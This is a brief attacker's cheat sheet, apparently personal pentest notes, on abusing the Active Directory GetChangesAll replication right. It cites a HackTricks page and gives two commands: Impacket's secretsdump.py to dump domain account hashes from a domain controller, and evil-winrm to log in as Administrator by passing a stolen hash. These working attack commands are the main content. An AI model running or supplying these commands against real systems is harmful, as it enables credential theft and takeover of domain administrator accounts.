GetChangesAll

https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse

#account with GetChangesAll permits dumping hashes for AD accounts, the hashes can be passed.

CD to Impacket

secretsdump.py 'useraccount:Password@10.0.0.1'

evil-winrm -u 'Administrator' -H '##hash###' -i 10.0.0.1